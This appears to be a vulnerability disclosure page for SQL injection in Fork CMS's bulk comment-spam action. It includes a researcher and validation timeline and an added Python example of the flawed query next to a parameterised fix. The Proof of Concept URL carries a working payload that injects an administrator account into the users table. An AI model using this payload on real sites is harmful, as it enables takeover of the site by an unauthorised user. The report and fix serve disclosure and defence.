SQL injection through marking blog comments on bulk as spam in forkcms/forkcms

Valid

Reported on

Mar 23rd 2022


Description

The comment IDs passed to the bulk comment action are not validated and are vulnerable to SQL injection.

Proof of Concept

https://127.0.0.1:8001/private/en/blog/mass_comment_action?token=q58o77xs9&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=spam

Impact

This vulnerability allows SQL injection.
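The report describes a bulk action that drops the submitted `id[]` values straight into an SQL statement. The following is an added example, not Fork CMS code: it contrasts that string-building pattern (returned as text only, never executed) with a hardened handler that validates every ID as a plain integer and binds the values through placeholders. The table and column names are assumptions standing in for the real schema, and the database is an in-memory SQLite instance constructed inline.

```python
import re
import sqlite3
from typing import Iterable, List

# Constructed in-memory schema; the table and column names are assumptions,
# not Fork CMS's real ones.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE blog_comments (id INTEGER PRIMARY KEY, status TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO blog_comments (id, status) VALUES (?, ?)",
        [(1, "published"), (2, "published"), (3, "published")],
    )
    conn.commit()
    return conn


def vulnerable_query(raw_ids: Iterable[str]) -> str:
    """The pattern the report describes: request values are concatenated into
    the IN list unchanged. Returned as text for comparison only; this function
    never touches the database."""
    return (
        "UPDATE blog_comments SET status = 'spam' WHERE id IN ("
        + ",".join(raw_ids)
        + ")"
    )


_ID_RE = re.compile(r"^[0-9]+$")  # ASCII digits only; str.isdigit() is wider


def parse_comment_ids(raw_ids: Iterable[str]) -> List[int]:
    """Reject anything that is not a plain positive integer before it gets
    anywhere near SQL. A ValueError here is the detection point: a value like
    '3);insert ...' can only come from a crafted request."""
    ids: List[int] = []
    for raw in raw_ids:
        if not _ID_RE.match(raw):
            raise ValueError(f"invalid comment id: {raw!r}")
        ids.append(int(raw))
    if not ids:
        raise ValueError("no comment ids supplied")
    return ids


def mark_as_spam(conn: sqlite3.Connection, raw_ids: Iterable[str]) -> int:
    """Hardened bulk action: validated integers bound through one placeholder
    per ID, so the values are data, never SQL. Returns the number of rows
    updated."""
    ids = parse_comment_ids(raw_ids)
    placeholders = ",".join("?" * len(ids))
    cur = conn.execute(
        f"UPDATE blog_comments SET status = 'spam' WHERE id IN ({placeholders})",
        ids,
    )
    conn.commit()
    return cur.rowcount


def statuses(conn: sqlite3.Connection) -> dict:
    """Helper for inspecting the table after an action."""
    return dict(conn.execute("SELECT id, status FROM blog_comments ORDER BY id"))


if __name__ == "__main__":
    db = make_db()
    print("updated:", mark_as_spam(db, ["1", "3"]))
    print(statuses(db))
    try:
        mark_as_spam(db, ["3);--"])
    except ValueError as exc:
        print("rejected:", exc)
```

Parameter binding alone is what closes the injection; the integer check is defence in depth and gives the application a clean place to log and reject a malformed request. An IN list needs one placeholder per value, which is why the placeholder string is built from the validated list length rather than written as a single `?`.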

We are processing your report and will contact the forkcms team within 24 hours. 2 months ago
Jelmer Prins modified the report
2 months ago
Jelmer Prins
2 months ago

Researcher

@admin I found this one while writing fixes for other reported issues, but it seems like I can't approve or confirm it.

Jamie Slome validated this vulnerability 2 months ago
Jelmer Prins has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on 6aca30 2 months ago
The fix bounty has been dropped